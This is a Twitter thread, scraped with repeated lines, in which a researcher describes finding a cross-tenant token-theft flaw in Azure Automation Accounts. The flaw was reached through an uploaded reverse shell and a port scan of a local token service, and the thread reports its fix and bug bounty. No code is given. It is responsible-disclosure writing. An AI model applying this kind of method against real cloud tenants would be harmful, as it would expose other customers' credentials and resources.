I found a vulnerability in #Azure allowing me to access Azure accounts of companies worth billions
We all know vulnerabilities exist. This isn't an injection, XSS, or RCE.
But the crazy thing about it?
It took 2 hours to discover. 🤯
Here's the story of #AutoWarp👇 (1/10)
We all know vulnerabilities exist. This isn't an injection, XSS, or RCE.
But the crazy thing about it?
It took 2 hours to discover. 🤯
Here's the story of #AutoWarp👇 (1/10)
Scrolling through the endless list of Azure services, I’m looking for a new target
So I click “Automation Accounts” not really knowing what it even means. I quickly realized that this is basically a service for running Python & PowerShell scripts. 🧐 (2/10)
So I click “Automation Accounts” not really knowing what it even means. I quickly realized that this is basically a service for running Python & PowerShell scripts. 🧐 (2/10)
I uploaded a reverse shell script and started typing every Windows command I could remember
The real fun started when I found this suspicious log on the machine:
"Creating asset retrieval web service. [assetRetrievalEndpoint=http://127.0.0.1:40008]" (3/10)
The real fun started when I found this suspicious log on the machine:
"Creating asset retrieval web service. [assetRetrievalEndpoint=http://127.0.0.1:40008]" (3/10)
This "asset retrieval service" turned out to be the server which serves you authentication tokens for your service managed identity.
Can you see the 🚩 though? (4/10)
Can you see the 🚩 though? (4/10)
The port, 40008? Why would someone choose such a random port?
Well..
Because other ports were taken. By other customers on the same machine!
You could just upload a script that tries every port in the environment and steal tokens belonging to other customers 😳
(5/10)
Well..
Because other ports were taken. By other customers on the same machine!
You could just upload a script that tries every port in the environment and steal tokens belonging to other customers 😳
(5/10)
Those tokens hold the permissions customers assign to their automation accounts. That means if you’ve used the service to manage your VMs, an attacker could too 😉 (6/10)
The issue was found and reported all in the same day. Microsoft fixed it within 4 days, classified it with critical severity and awarded a $40,000 #BugBounty
But let's talk about lessons learned here for a moment:
(7/10)
But let's talk about lessons learned here for a moment:
(7/10)
1. Cloud service vulnerabilities are scary. Think about all the companies potentially impacted by one single bug
2. On the flip side, it was fixed within a few days with minimal work
Microsoft took additional action to make sure this doesn't happen again:
(8/10)
2. On the flip side, it was fixed within a few days with minimal work
Microsoft took additional action to make sure this doesn't happen again:
(8/10)
They performed an internal review and research of their service to hunt for different variants of this bug.
It's a simple software design oversight that anyone could have made. I believe we're going to see a lot more of those in the future. (9/10)
It's a simple software design oversight that anyone could have made. I believe we're going to see a lot more of those in the future. (9/10)
(10/10) Read about the full discovery here > orca.security/resources/blog…
• • •
Missing some Tweet in this thread? You can try to
force a refresh
